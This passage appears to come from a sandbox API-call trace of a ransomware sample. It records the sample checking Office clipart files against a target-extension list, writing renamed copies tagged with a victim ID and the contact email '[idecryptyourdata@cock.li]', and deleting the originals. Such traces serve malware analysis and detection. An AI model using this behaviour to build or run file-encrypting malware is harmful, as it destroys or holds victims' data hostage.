Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF") returned 68 [0184.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF") returned 68 [0184.194] lstrlenW (lpString=".doc") returned 4 [0184.194] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.194] lstrlenW (lpString=".docx") returned 5 [0184.194] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0184.194] lstrlenW (lpString=".pdf") returned 4 [0184.194] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.194] lstrlenW (lpString=".xls") returned 4 [0184.194] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.194] lstrlenW (lpString=".xlsx") returned 5 [0184.194] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0184.195] lstrlenW (lpString=".ppt") returned 4 [0184.195] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF") returned 68 [0184.195] lstrlenW (lpString=".zip") returned 4 [0184.195] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.195] lstrlenW (lpString=".rar") returned 4 [0184.195] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.195] lstrlenW (lpString=".bz2") returned 4 [0184.195] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.195] lstrlenW (lpString=".7z") returned 3 [0184.195] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF") returned 68 [0184.195] lstrlenW (lpString=".dbf") returned 4 [0184.195] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF") returned 68 [0184.195] lstrlenW (lpString=".1cd") returned 4 [0184.195] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF") returned 68 [0184.195] lstrlenW (lpString=".jpg") returned 4 [0184.195] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.195] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.195] lstrlenW (lpString="J0107482.WMF") returned 12 [0184.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107482.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0184.196] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=4980) returned 1 [0184.196] CloseHandle (hObject=0x360) returned 1 [0184.196] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107482.wmf")) returned 0x220 [0184.196] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107482.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107482.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0184.197] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.197] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107482.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0184.197] GetLastError () returned 0x0 [0184.197] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x1374, lpOverlapped=0x0) returned 1 [0184.199] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1380, lpOverlapped=0x0) returned 1 [0184.201] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0184.201] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0184.201] SetEndOfFile (hFile=0x368) returned 1 [0184.202] CloseHandle (hObject=0x368) returned 1 [0184.202] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.202] SetEndOfFile (hFile=0x360) returned 1 [0184.203] CloseHandle (hObject=0x360) returned 1 [0184.203] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.203] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107482.wmf")) returned 1 [0184.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF") returned 68 [0184.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF") returned 68 [0184.203] lstrlenW (lpString=".doc") returned 4 [0184.203] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.203] lstrlenW (lpString=".docx") returned 5 [0184.203] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0184.203] lstrlenW (lpString=".pdf") returned 4 [0184.204] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.204] lstrlenW (lpString=".xls") returned 4 [0184.204] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.204] lstrlenW (lpString=".xlsx") returned 5 [0184.204] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0184.204] lstrlenW (lpString=".ppt") returned 4 [0184.204] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF") returned 68 [0184.204] lstrlenW (lpString=".zip") returned 4 [0184.204] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.204] lstrlenW (lpString=".rar") returned 4 [0184.204] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.204] lstrlenW (lpString=".bz2") returned 4 [0184.204] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.204] lstrlenW (lpString=".7z") returned 3 [0184.204] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF") returned 68 [0184.204] lstrlenW (lpString=".dbf") returned 4 [0184.204] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF") returned 68 [0184.204] lstrlenW (lpString=".1cd") returned 4 [0184.204] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF") returned 68 [0184.204] lstrlenW (lpString=".jpg") returned 4 [0184.204] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF") returned 68 [0184.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF") returned 68 [0184.205] lstrlenW (lpString=".doc") returned 4 [0184.205] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.205] lstrlenW (lpString=".docx") returned 5 [0184.205] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0184.205] lstrlenW (lpString=".pdf") returned 4 [0184.205] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.205] lstrlenW (lpString=".xls") returned 4 [0184.205] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.205] lstrlenW (lpString=".xlsx") returned 5 [0184.205] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0184.205] lstrlenW (lpString=".ppt") returned 4 [0184.205] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF") returned 68 [0184.205] lstrlenW (lpString=".zip") returned 4 [0184.205] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.205] lstrlenW (lpString=".rar") returned 4 [0184.205] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.205] lstrlenW (lpString=".bz2") returned 4 [0184.205] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.205] lstrlenW (lpString=".7z") returned 3 [0184.205] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF") returned 68 [0184.205] lstrlenW (lpString=".dbf") returned 4 [0184.205] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF") returned 68 [0184.205] lstrlenW (lpString=".1cd") returned 4 [0184.205] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107482.WMF") returned 68 [0184.205] lstrlenW (lpString=".jpg") returned 4 [0184.205] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.206] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.206] lstrlenW (lpString="J0107484.WMF") returned 12 [0184.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107484.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0184.206] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=3040) returned 1 [0184.206] CloseHandle (hObject=0x360) returned 1 [0184.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107484.wmf")) returned 0x220 [0184.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107484.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107484.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0184.207] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.207] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107484.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0184.208] GetLastError () returned 0x0 [0184.208] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0xbe0, lpOverlapped=0x0) returned 1 [0184.484] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xbf0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xbf0, lpOverlapped=0x0) returned 1 [0184.514] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0184.514] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0184.515] SetEndOfFile (hFile=0x368) returned 1 [0184.515] CloseHandle (hObject=0x368) returned 1 [0184.515] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.515] SetEndOfFile (hFile=0x360) returned 1 [0184.516] CloseHandle (hObject=0x360) returned 1 [0184.516] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.516] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107484.wmf")) returned 1 [0184.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF") returned 68 [0184.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF") returned 68 [0184.516] lstrlenW (lpString=".doc") returned 4 [0184.517] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.517] lstrlenW (lpString=".docx") returned 5 [0184.517] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0184.517] lstrlenW (lpString=".pdf") returned 4 [0184.517] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.517] lstrlenW (lpString=".xls") returned 4 [0184.517] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.517] lstrlenW (lpString=".xlsx") returned 5 [0184.517] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0184.517] lstrlenW (lpString=".ppt") returned 4 [0184.517] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF") returned 68 [0184.517] lstrlenW (lpString=".zip") returned 4 [0184.517] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.517] lstrlenW (lpString=".rar") returned 4 [0184.517] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.517] lstrlenW (lpString=".bz2") returned 4 [0184.517] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.517] lstrlenW (lpString=".7z") returned 3 [0184.517] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF") returned 68 [0184.517] lstrlenW (lpString=".dbf") returned 4 [0184.517] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF") returned 68 [0184.517] lstrlenW (lpString=".1cd") returned 4 [0184.517] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF") returned 68 [0184.517] lstrlenW (lpString=".jpg") returned 4 [0184.517] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF") returned 68 [0184.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF") returned 68 [0184.518] lstrlenW (lpString=".doc") returned 4 [0184.518] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.518] lstrlenW (lpString=".docx") returned 5 [0184.518] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0184.518] lstrlenW (lpString=".pdf") returned 4 [0184.518] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.518] lstrlenW (lpString=".xls") returned 4 [0184.518] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.518] lstrlenW (lpString=".xlsx") returned 5 [0184.518] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0184.518] lstrlenW (lpString=".ppt") returned 4 [0184.518] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF") returned 68 [0184.518] lstrlenW (lpString=".zip") returned 4 [0184.518] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.518] lstrlenW (lpString=".rar") returned 4 [0184.518] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.518] lstrlenW (lpString=".bz2") returned 4 [0184.518] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.518] lstrlenW (lpString=".7z") returned 3 [0184.518] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF") returned 68 [0184.518] lstrlenW (lpString=".dbf") returned 4 [0184.518] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF") returned 68 [0184.518] lstrlenW (lpString=".1cd") returned 4 [0184.518] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107484.WMF") returned 68 [0184.518] lstrlenW (lpString=".jpg") returned 4 [0184.518] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.519] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.519] lstrlenW (lpString="J0107512.WMF") returned 12 [0184.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107512.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0184.519] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=11404) returned 1 [0184.519] CloseHandle (hObject=0x360) returned 1 [0184.520] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107512.wmf")) returned 0x220 [0184.520] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107512.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107512.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0184.520] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.520] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107512.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0184.521] GetLastError () returned 0x0 [0184.521] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x2c8c, lpOverlapped=0x0) returned 1 [0184.526] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x2c90, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x2c90, lpOverlapped=0x0) returned 1 [0184.527] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0184.527] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0184.527] SetEndOfFile (hFile=0x368) returned 1 [0184.527] CloseHandle (hObject=0x368) returned 1 [0184.527] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.527] SetEndOfFile (hFile=0x360) returned 1 [0184.528] CloseHandle (hObject=0x360) returned 1 [0184.528] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.529] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107512.wmf")) returned 1 [0184.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF") returned 68 [0184.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF") returned 68 [0184.529] lstrlenW (lpString=".doc") returned 4 [0184.529] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.529] lstrlenW (lpString=".docx") returned 5 [0184.529] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0184.530] lstrlenW (lpString=".pdf") returned 4 [0184.530] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.530] lstrlenW (lpString=".xls") returned 4 [0184.530] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.530] lstrlenW (lpString=".xlsx") returned 5 [0184.530] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0184.530] lstrlenW (lpString=".ppt") returned 4 [0184.530] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF") returned 68 [0184.530] lstrlenW (lpString=".zip") returned 4 [0184.530] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.530] lstrlenW (lpString=".rar") returned 4 [0184.530] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.530] lstrlenW (lpString=".bz2") returned 4 [0184.530] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.530] lstrlenW (lpString=".7z") returned 3 [0184.530] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF") returned 68 [0184.530] lstrlenW (lpString=".dbf") returned 4 [0184.530] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF") returned 68 [0184.530] lstrlenW (lpString=".1cd") returned 4 [0184.530] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF") returned 68 [0184.530] lstrlenW (lpString=".jpg") returned 4 [0184.530] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF") returned 68 [0184.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF") returned 68 [0184.531] lstrlenW (lpString=".doc") returned 4 [0184.531] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.531] lstrlenW (lpString=".docx") returned 5 [0184.531] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0184.531] lstrlenW (lpString=".pdf") returned 4 [0184.531] lstrcmpiW 